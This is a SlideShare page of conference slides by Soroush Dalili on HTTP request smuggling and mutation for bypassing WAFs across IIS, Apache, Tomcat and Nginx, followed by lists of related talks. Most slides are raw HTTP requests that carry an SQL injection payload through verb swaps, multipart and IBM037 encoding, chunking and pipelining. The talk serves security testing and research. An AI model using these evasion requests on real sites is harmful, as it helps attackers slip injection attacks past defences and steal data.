SlideShare une entreprise Scribd logo

A Forgotten HTTP Invisibility Cloak

Télécharger en tant que PPTX, PDF
Soroush Dalili
Soroush Dalili

This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks. Presented @ BSides Manchester 2017 & SteelCon 2017

Internet
1  sur  43
A Forgotten HTTP Invisibility Cloak BSides Manchester 2017 – by Soroush Dalili
About Me • A web application security guy • Breaker > Builder • Love to bypass stuff with a single character  • e.g. Remember IIS6 file.asp;.jpg bypass? • Working at NCC Group • Bug bounty hunter where possible! • Twitter: @irsdl
This Talk! • Messing with HTTP… (version < 2) • HTTP Request Smuggling! • Not all new, but forgotten • Lots of heat • We are burning our bypass techniques! • Brain teasers alert! o_x • Boring HTTP requests alert! x_x
Game Changers! • Web Servers (IIS, Apache, …) • Technologies (ASPX, ASP, JSP, …) • Gateways and Proxies • Also important: • Version • Configuration • The same with WAF/IDS
Our Targeted Webservers! • Nginx,uWSGI-Django-Python2 & Python3 • Apache-TOMCAT8-JVM1.8-JSP & TOMCAT7-JVM1.6 • Apache-PHP5 (mod_php & FastCGI) • PHP7.1 on IIS8-FastCGI • ASP Classic on IIS6, 7.5, 8, 10 • ASP.NET on IIS6, 7.5, 8, 10
What The HTTP? • Textual & simple (before version 2) • Apart from version 2 • v1.1 (rfc2068 -> rfc2616 -> rfc7230-7235) • v1.0 (rfc1945) • v0.9 -> not expected to be supported but it still does
HTTP 0.9
A Simple HTTP Request POST /path/sample.aspx?input0=QueryValue HTTP/1.1 HOST: victim.com Cookie: input2=CookieValue Content-Type: application/x-www-form-urlencoded Content-Length: 18 input1=PostValue
Request Mutation • Request A != Request B • Response A == Response B • Perhaps to solve one of these problems: • Browsing your favourite betting site while at work! • Looking at restricted areas of a site! • Fingerprinting the Servers • Cache poisoning, Response Splitting, Socket Buffer Poisoning (e.g. Hiding Wookiees in HTTP – Defcon24) • Bypassing a WAF/IDS during security testing!
WAF in Security Testing!
Common Mutations • Well documented in RFCs… • e.g. Line folding in headers • Common behaviours • /foo/../ in a normal path • URL-encoding • HTML-encoding in XML • etc. etc. • Normally detected by most of the WAFs
Strange Mutations • Needs researching… repurposing! • Some examples to start with: • &==; – Python Django between parameters! • FooBar==POST verb – Apache with PHP • <%I%M%u011e>==<IMG> – IIS ASP Classic • ;/path1;foo/path2;bar/;==/path1/path2/ – Apache Tomcat • Sometimes even against RFC:
IIS 10 ASPX (v4) Test Case – Request A POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
HTTP Verb Replacement • Replacing POST with GET • Works on: • IIS (tested on ASP classic, ASPX, PHP)
Original Request POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
HTTP Verb Replacement GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
Changing Body Type • File uploads also use “multipart/form-data” • Works on: • Nginx,uWSGI-Django-Python3 • Nginx,uWSGI-Django-Python2 • Apache-PHP5(mod_php) • Apache-PHP5(FastCGI) • IIS (ASPX, PHP)
Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
Changing Body Type GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: form-data; name="input1" 'union all select * from users-- --1--
Removing Unnecessary Parts! • What if we remove some parts of the body? • Removing last “--” in the boundary: • Nginx,uWSGI-Django-Python 2 & 3 • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP) • Removing “form-data;” from the multipart request: • Apache-PHP5(mod_php & FastCGI) • IIS (ASPX, PHP)
Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: form-data; name="input1" 'union all select * from users-- --1--
Removing Unnecessary Parts! GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: name="input1" 'union all select * from users-- --1
Adding Useless Parts! • What if we add some confusing parts? • Additional headers • Duplicated values • Useless stuffs, who cares? • Spacing can be useful too • CRLF after “Content-Disposition:” and before the space • PHP  ASPX 
Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: multipart/form-data; boundary=1 Content-Length: 95 --1 Content-Disposition: name="input1" 'union all select * from users-- --1
Adding Useless Parts! GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Length: 113 Content-Type: multipart/form-data; boundary=1,boundry=irsdl --1 --1 Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users— --1
Changing Request Encoding! • “Content-Type” again… but charset now! • Normally used for responses but • Also works on the requests: • Nginx,uWSGI-Django-Python 2,3 • Apache-TOMCAT 7/8-JVM1.6/1.8-JSP • IIS (ASPX) • Examples: • multipart/form-data; charset=ibm037,boundary=blah • multipart/form-data;boundary=blah;charset=ibm037 • application/x-www-form-urlencoded;charset=ibm037
Previous Request GET /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Length: 109 Content-Type: multipart/form-data; boundary=1,boundry=irsdl --1 --1 Content-Disposition: name="input1"; filename ="test.jpg" 'union all select * from users— --1
Changing Request Encoding! GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 109 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl --1 --1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@@@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1
Encoding Example: Using Python import urllib s = 'Content-Disposition: name="input1"; filename ="test.jpg"' print urllib.quote_plus(s.encode("IBM037")) > %C3%96%95%A3%85%95%A3%60%C4%89%A2%97%96% A2%89%A3%89%96%95z%40%95%81%94%85%7E%7F%89 %95%97%A4%A3%F1%7F%5E%40%86%89%93%85%95%8 1%94%85%40%40%40%7E%7F%A3%85%A2%A3K%91%97 %87%7F
Chunking The Body! • We can go further & further • Transfer-Encoding: chunked • Size in Hex before each part! • Comments after size with a “;” as delimiter • Ends with 0 and a CRLF
Previous Request GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl --1 --1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@••”…~•‰•—¤£ñ•^@†‰“…••”…@~•£…¢£K‘—‡• }¤•‰–•@•““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1
Chunked! GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl Transfer-Encoding: chunked A --1 --1 63 Ö•£…•£`ĉ¢—–¢‰£‰–•z@•�”…~‰•—¤£ñ^@†‰“…•�”…@~£…¢£K‘—‡• }¤•‰–•@�““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 0
More Useless Data – Request B GET /path/sample.aspx?%89%95%97%A4%A3%F0=%F0 HTTP/1.1 HOST: victim.com Content-Length: 107 Content-Type: multipart/form-data; charset=ibm037, boundary=1,boundry=irsdl Transfer-Encoding: chunked 0000A ;--irsdl --1 --1 63;--1 Ö•£…•£`ĉ¢—–¢‰£‰–•z@•�”…~‰•—¤£ñ^@†‰“…•�”…@~£…¢£K‘—‡• }¤•‰–•@�““@¢…“…ƒ£@@†™–”@¤¢…™¢`` --1 0;--1--
Remember the Original Request? POST /path/sample.aspx?input0=0 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 41 input1='union all select * from users--
HTTP Pipelining
HTTP Pipelining • HTTP/1.1 & 1.0 • HTTP 1.0 needs: “Connection: keep-alive” • “Connection: close” stops it (default in 1.0) • Hop by Hop • Still FIFO • 1 HTTP request can contain multiple requests • Content-Length is important if not chunked!
HTTP Pipelining Example POST /sample.aspx?input0=1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 21 input1=nothingToSee POST /foobar.aspx?input0=2 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 3 A=B …
HTTP Pipelining & HTTP 0.9 POST /sample.aspx?input0=1 HTTP/1.1 HOST: victim.com Content-Type: application/x-www-form-urlencoded Content-Length: 21 input1=nothingToSee GET https://victim.com/anotherpage.aspx?input=value! • Bypassing default settings of a famous WAF when PATH is forbidden • What about Apache Tomcat?
Pro Tips! • Be smart, there are more techniques, more confusions • But don’t be greedy, perhaps try them separately • Different technologies are different • External WAFs (e.g. cloud based) are easier to bypass • A proxy server can ruin your fun • but can also make it more fun!
http://HTTP.NINJA/ • Work in progress… • Host test files, test cases, results • More tools to come • Needs community participation in near future
Thank You!

Recommandé

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 

Recommandé

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Reversing Google Protobuf protocol
Reversing Google Protobuf protocolReversing Google Protobuf protocol
Reversing Google Protobuf protocoln|u - The Open Security Community
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST APINutan Kumar Panda
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORSVladimir Dzhuvinov
 
Apache ActiveMQ and Apache Camel
Apache ActiveMQ and Apache CamelApache ActiveMQ and Apache Camel
Apache ActiveMQ and Apache CamelOmi Om
 
Test your microservices with REST-Assured
Test your microservices with REST-AssuredTest your microservices with REST-Assured
Test your microservices with REST-AssuredMichel Schudel
 
CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)securityn|u - The Open Security Community
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Writing a fast HTTP parser
Writing a fast HTTP parserWriting a fast HTTP parser
Writing a fast HTTP parserfukamachi
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 

Contenu connexe

Tendances

Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORSVladimir Dzhuvinov
 
Apache ActiveMQ and Apache Camel
Apache ActiveMQ and Apache CamelApache ActiveMQ and Apache Camel
Apache ActiveMQ and Apache CamelOmi Om
 
Test your microservices with REST-Assured
Test your microservices with REST-AssuredTest your microservices with REST-Assured
Test your microservices with REST-AssuredMichel Schudel
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 

Tendances (20)

Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologiesOWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
OWASP Poland Day 2018 - Frans Rosen - Attacking modern web technologies
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Reversing Google Protobuf protocol
Reversing Google Protobuf protocolReversing Google Protobuf protocol
Reversing Google Protobuf protocol
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Cross-domain requests with CORS
Cross-domain requests with CORSCross-domain requests with CORS
Cross-domain requests with CORS
 
Apache ActiveMQ and Apache Camel
Apache ActiveMQ and Apache CamelApache ActiveMQ and Apache Camel
Apache ActiveMQ and Apache Camel
 
Test your microservices with REST-Assured
Test your microservices with REST-AssuredTest your microservices with REST-Assured
Test your microservices with REST-Assured
 
CORS and (in)security
CORS and (in)securityCORS and (in)security
CORS and (in)security
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 

Similaire à A Forgotten HTTP Invisibility Cloak

Writing a fast HTTP parser
Writing a fast HTTP parserWriting a fast HTTP parser
Writing a fast HTTP parserfukamachi
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesSagi Brody
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesDefconRussia
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web HackerHeadLightSecurity
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsPositive Hack Days
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaOSSCube
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testingTomas Doran
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testingTomas Doran
 
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietachPLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietachPROIDEA
 
«Scrapy internals» Александр Сибиряков, Scrapinghub
«Scrapy internals» Александр Сибиряков, Scrapinghub«Scrapy internals» Александр Сибиряков, Scrapinghub
«Scrapy internals» Александр Сибиряков, Scrapinghubit-people
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
 
Spy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformSpy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformRedge Technologies
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...Felipe Prado
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 

Similaire à A Forgotten HTTP Invisibility Cloak (20)

Writing a fast HTTP parser
Writing a fast HTTP parserWriting a fast HTTP parser
Writing a fast HTTP parser
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation Strategies
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
Lecture 7: Server side programming
Lecture 7: Server side programmingLecture 7: Server side programming
Lecture 7: Server side programming
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web Hacker
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Top ten-list
Top ten-listTop ten-list
Top ten-list
 
Securing Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep SharmaSecuring Your Webserver By Pradeep Sharma
Securing Your Webserver By Pradeep Sharma
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web Hacker
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
 
Webapp security testing
Webapp security testingWebapp security testing
Webapp security testing
 
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietachPLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
PLNOG 18 - Paweł Małachowski - Spy hard czyli regexpem po pakietach
 
«Scrapy internals» Александр Сибиряков, Scrapinghub
«Scrapy internals» Александр Сибиряков, Scrapinghub«Scrapy internals» Александр Сибиряков, Scrapinghub
«Scrapy internals» Александр Сибиряков, Scrapinghub
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Spy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platformSpy hard, challenges of 100G deep packet inspection on x86 platform
Spy hard, challenges of 100G deep packet inspection on x86 platform
 
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...DEF CON 27 - ORANGE TSAI and MEH CHANG - infiltrating corporate intranet like...
